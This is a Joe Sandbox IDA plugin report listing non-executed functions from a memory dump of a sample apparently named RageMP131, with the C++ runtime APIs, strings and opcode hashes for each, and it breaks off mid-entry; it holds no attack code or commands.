Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8468138193243b282cf823e628e2124b4f0c07e6bd31875fbab473d920964426
Instruction ID: e8d53ad9f7b45964f880d6ce111be7c4f3667348f0911da618dda90d79427ade
Opcode Fuzzy Hash: 8468138193243b282cf823e628e2124b4f0c07e6bd31875fbab473d920964426
Instruction Fuzzy Hash: 72E0A0B768C330EDE242494567496F56A2EB397230330A217F503A1A87B795675C7021

Non-executed Functions

Function 002DAB20 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002DAB43
std::_Lockit::_Lockit.LIBCPMT ref: 002DAB65
std::_Lockit::~_Lockit.LIBCPMT ref: 002DAB85
std::_Lockit::~_Lockit.LIBCPMT ref: 002DABAF
std::_Lockit::_Lockit.LIBCPMT ref: 002DAC1D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002DAC69
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002DAC83
std::_Lockit::~_Lockit.LIBCPMT ref: 002DAD18
std::_Facet_Register.LIBCPMT ref: 002DAD25

Strings

bad locale name, xrefs: 002DAD3F

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 4a5b69a57ef61bb398751034a918341ceac49531c8bae2442136d41c3540c00b
Instruction ID: 3596b0245ef26a5c75a393d1082aa96313cfb37a85fa86b7fecedc98bd6001d1
Opcode Fuzzy Hash: 4a5b69a57ef61bb398751034a918341ceac49531c8bae2442136d41c3540c00b
Instruction Fuzzy Hash: 28617BB1D102499FDF12DFA4D845B9EBBF8AF15314F18405AE804AB391EB34ED05CBA2

Function 00273770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002737E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00273835
__Getctype.LIBCPMT ref: 0027384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0027386A
std::_Lockit::~_Lockit.LIBCPMT ref: 002738FF

Strings

bad locale name, xrefs: 0027391C
0:', xrefs: 00273848

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:'$bad locale name
API String ID: 1840309910-3347340704
Opcode ID: efc1ab4c46654e921930b174f39d2b2651e7cee445ea4a114a77c16188381243
Instruction ID: 39b3ddf4b4fd8f74d36719129aff16b12dd018d0dc17708b1b374270bc8143ed
Opcode Fuzzy Hash: efc1ab4c46654e921930b174f39d2b2651e7cee445ea4a114a77c16188381243
Instruction Fuzzy Hash: 94515FB1D103499BDF11DFA4D846B9EFBB8AF14310F148169EC08AF241E775EA18DB92

Function 003504D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00350507
___except_validate_context_record.LIBVCRUNTIME ref: 0035050F
_ValidateLocalCookies.LIBCMT ref: 00350598
__IsNonwritableInCurrentImage.LIBCMT ref: 003505C3
_ValidateLocalCookies.LIBCMT ref: 00350618

Strings

csm, xrefs: 003505AD

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
Instruction ID: 8e7dc35871e5cd49398ed5b4bcbe384538ad416425dfcdef370e543c350bf461
Opcode Fuzzy Hash: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
Instruction Fuzzy Hash: 2341C430A04208ABCF16DF69C880E9E7BB4AF45325F148455FC18AB362E732DA59CF90

Function 002D9240 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002D9263
std::_Lockit::_Lockit.LIBCPMT ref: 002D9286
std::_Lockit::~_Lockit.LIBCPMT ref: 002D92A6
std::_Facet_Register.LIBCPMT ref: 002D931B
std::_Lockit::~_Lockit.LIBCPMT ref: 002D9333
Concurrency::cancel_current_task.LIBCPMT ref: 002D934B

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 038eb88e9bc25fbc1d5bdd33249a715d382ec711aa3f9f39f2a41899c2de220e
Instruction ID: 11146d8bd908ba573ada78268ac825660b1f38d7ed96bce9c95b33023ee7288a
Opcode Fuzzy Hash: 038eb88e9bc25fbc1d5bdd33249a715d382ec711aa3f9f39f2a41899c2de220e
Instruction Fuzzy Hash: 5941CF71910215AFCF16DF58D885BAEBBB8FF42310F14425AE8046B391D730AD95CBD1

Function 00275DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002760F2
___std_exception_destroy.LIBVCRUNTIME ref: 0027617F
___std_exception_copy.LIBVCRUNTIME ref: 00276248

Strings

recursive_directory_iterator::operator++, xrefs: 002761CC

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: d0df4faeb183193c5760e48c18384fa8a467427eee8f6a9f35b5c5ae4780f301
Instruction ID: 0594a0cc6d550537fc2993e345aaf3bf4f77f323e2df88938902f8f787ed5c99
Opcode Fuzzy Hash: d0df4faeb183193c5760e48c18384fa8a467427eee8f6a9f35b5c5ae4780f301
Instruction Fuzzy Hash: 9BE145B19106049FCB29DF68C845BAEF7F9FF45300F10861DE41A97B81E7B4AA54CBA1

Function 002784C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002786DE
___std_exception_destroy.LIBVCRUNTIME ref: 002786ED

Strings

, column , xrefs: 00278555, 0027856B
at line , xrefs: 00278518

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 125baf7728b78b62a0fa8121292faf5e25d70e58cd6f9b2eb78f086d0f8516a6
Instruction ID: 195fe1d863000ff6bd8b5965a9c09037fea22a570f74ba845e180f6ccf4b6ea8
Opcode Fuzzy Hash: 125baf7728b78b62a0fa8121292faf5e25d70e58cd6f9b2eb78f086d0f8516a6
Instruction Fuzzy Hash: 9C614C71E102049FDB09DF68CC8979EBBB9FF45310F14821CE419AB781EB74AA90CB91

Function 002E3150 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002E4109
___std_exception_destroy.LIBVCRUNTIME ref: 002E4122

Strings

value, xrefs: 002E402F

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 6bf397057438b9e714ff422a7ac90402f6495ef7a9735df653876eb5fbb4c03b
Instruction ID: d238d4fd97478cca79163f5b8fa857034f87b2e33773b9f20a07177407746e52
Opcode Fuzzy Hash: 6bf397057438b9e714ff422a7ac90402f6495ef7a9735df653876eb5fbb4c03b
Instruction Fuzzy Hash: C051B3B0C10288DBDF15DFA4CC89BDDBBB4AF05304F148259E448AB382D7756A98CB61

Function 00273B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00273C0F

Strings

ios_base::failbit set, xrefs: 00273AC8, 00273BB1
ios_base::eofbit set, xrefs: 00273BB6
ios_base::badbit set, xrefs: 00273BA7, 00273BD2, 00273BF3

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: 1ba982feae1316480fa85807d5f32f07fcb56bb261b5d4406637b8933199f747
Instruction ID: ff417a7a5d958731aab06304b771b13323bc143b358cf95a1f68f3d2ae7e86c6
Opcode Fuzzy Hash: 1ba982feae1316480fa85807d5f32f07fcb56bb261b5d4406637b8933199f747
Instruction Fuzzy Hash: CC11D2B6920709AFC715DF58D801B9AB3D8EF06320F14C52AF95C9B281F774EA24CB91

Function 002E26F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 002E2BD3

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 01a967d14be0733641e64cbc69bb50ff7b17bbbc526a5ab0eeb7ca28139cd986
Instruction ID: b63141e3bdff4508e106116ce9f99502dfbd3eece4a605317f297c32934a5f1a
Opcode Fuzzy Hash: 01a967d14be0733641e64cbc69bb50ff7b17bbbc526a5ab0eeb7ca28139cd986
Instruction Fuzzy Hash: 67E1F671A10146DFCB18DF69C891A6DB7E9FF48310F648369E81A9B382D730ED65CB90

Function 00278080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0027844D

Strings

parse error, xrefs: 00278149, 00278162
ror, xrefs: 002780D4

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 87698d26d3adb36f77554f4607e662a13d11798f6052d2bfdc83d73e97533c59
Instruction ID: 3d1654d047f19d5d8062bb9a9cafca8705c360263f37c69e2b8a27e82b746403
Opcode Fuzzy Hash: 87698d26d3adb36f77554f4607e662a13d11798f6052d2bfdc83d73e97533c59
Instruction Fuzzy Hash: 69C11731D206498FEB09CF68CC8979DBB75FF45304F14C248E4086B792DBB4AA94CB91

Function 00277DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00278051
___std_exception_destroy.LIBVCRUNTIME ref: 00278060

Strings

[json.exception., xrefs: 00277E1C

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 419064be4f55501ded65e828b5a55aee135d6d07bb460ae4704b461920b6ed6f
Instruction ID: 97923d660fc6d235490ee3944938389f686b57ff029218d748a27d681caff89b
Opcode Fuzzy Hash: 419064be4f55501ded65e828b5a55aee135d6d07bb460ae4704b461920b6ed6f
Instruction Fuzzy Hash: 0A9127309102089FDB19CFA8CC85BAEFBB5FF45314F14825DE404AB792D7B0A994CB91

Function 00273A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00273C0F

Strings

ios_base::failbit set, xrefs: 00273AC8
ios_base::badbit set, xrefs: 00273BA7, 00273BD2, 00273BF3

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
